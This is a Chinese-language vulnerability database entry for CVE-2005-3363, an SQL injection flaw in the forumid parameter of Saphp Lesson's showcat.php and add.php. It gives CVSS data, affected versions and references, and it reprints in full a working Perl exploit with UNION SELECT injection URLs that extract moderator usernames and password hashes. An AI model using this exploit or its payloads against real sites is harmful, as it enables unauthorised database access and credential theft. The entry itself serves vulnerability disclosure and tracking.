CVE-2005-3363
CVSS7.5
发布时间 :2005-10-30 09:34:00
修订时间 :2016-10-17 23:34:37
NMCOE    

[原文]SQL injection vulnerability in Saphp Lesson, possibly saphp Lesson1.1 and saphpLesson2.0, allows remote attackers to execute arbitrary SQL commands via the forumid parameter in (1) showcat.php and (2) add.php.


[CNNVD]Saphp Lesson 'forumid'参数SQL注入漏洞(CNNVD-200510-268)

        Saphp Lesson,可能是saphp Lesson1.1和saphpLesson2.0当中存在SQL注入漏洞。远程攻击者可以借助(1)showcat.php和(2)add.php中的forumid参数,执行任意SQL指令。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:saphp:saphplesson:1.1
cpe:/a:saphp:saphplesson:2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3363
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3363
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-268
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=113018965520240&w=2
(UNKNOWN)  BUGTRAQ  20051024 SQL saphp Lesson
http://milw0rm.com/exploits/1530
(UNKNOWN)  MILW0RM  1530
http://securityreason.com/securityalert/111
(UNKNOWN)  SREASON  111
http://www.attrition.org/pipermail/vim/2005-October/000313.html
(UNKNOWN)  VIM  20051029 Saphp Lesson
http://www.securityfocus.com/archive/1/archive/1/430906/30/5610/threaded
(UNKNOWN)  BUGTRAQ  20060412 SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit
http://www.securityfocus.com/archive/1/archive/1/440120/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060711 saphp "add.php" forumid Parameter SQL Injection
http://www.securityfocus.com/archive/1/archive/1/472799/100/0/threaded
(UNKNOWN)  BUGTRAQ  20070704 SQL Injection in saphp "showcat.php"
http://www.securityfocus.com/bid/15185
(UNKNOWN)  BID  15185
http://xforce.iss.net/xforce/xfdb/22861
(UNKNOWN)  XF  saphplesson-multiple-sql-injection(22861)
http://xforce.iss.net/xforce/xfdb/27746
(UNKNOWN)  XF  saphp-add-sql-injection(27746)

- 漏洞信息

Saphp Lesson 'forumid'参数SQL注入漏洞
高危 SQL注入
2005-10-30 00:00:00 2005-10-31 00:00:00
远程  
        Saphp Lesson,可能是saphp Lesson1.1和saphpLesson2.0当中存在SQL注入漏洞。远程攻击者可以借助(1)showcat.php和(2)add.php中的forumid参数,执行任意SQL指令。

- 公告与补丁

        暂无数据

- 漏洞信息 (1530)

SaphpLesson 2.0 (forumid) Remote SQL Injection Exploit (EDBID:1530)
php webapps
2006-02-25 Verified
0 SnIpEr_SA
N/A [点击下载]
#!/usr/bin/perl
#
# For password
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor
# For username
# http://www.example.com/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
# sent in by SnIpEr_SA (selfar2002[at]hotmail.com)
# ported by str0ke (milw0rm.com)

use LWP::Simple;

$serv     =  $ARGV[0];
$path     =  $ARGV[1];

sub usage
 {
    print "\nSaphpLesson 2.0 SQL-Injection \n";
    print "By SnIpEr_SA Ported by str0ke\n";
    print "Usage: $0 www.example.com /directory/\n";
    print "sever    -  URL\n";
    print "path     -  path to showcat.php\n";
    exit ();
}

sub exploit
 {
    print qq(
    SaphpLesson 2.0 SQL-Injection
    By SnIpEr_SA Ported by str0ke\n\n);

    $URL = sprintf("http://%s%sshowcat.php?forumid=-1+union+select+ModName+from+modretor",$serv,$path);
    $content = get "$URL";
    if ($content =~ /(\[)(.*)(\]\<\/title\>)/){&user;}else{print "No Workie\n";}
    $URL = sprintf("http://%s%sshowcat.php?forumid=-1+union+select+ModPassword+from+modretor",$serv,$path);
    $content = get "$URL";
    if ($content =~ /(\[)(\w{32})(\]\<\/title\>)/){&showh;}else{print "No Workie\n";}
}

sub user { print "[*] Username: $2\n";}
sub showh { print "[*] Hash: $2\n\n";}

if (@ARGV != 2){&usage;}else{&exploit;}

# milw0rm.com [2006-02-25]
		

- 漏洞信息

20289
saphp Lesson showcat.php forumid Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

saphp Lesson contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'showcat.php' script not properly sanitizing user-supplied input to the 'forumid' variable. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database.

- 时间线

2005-10-24 Unknow
2005-10-24 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站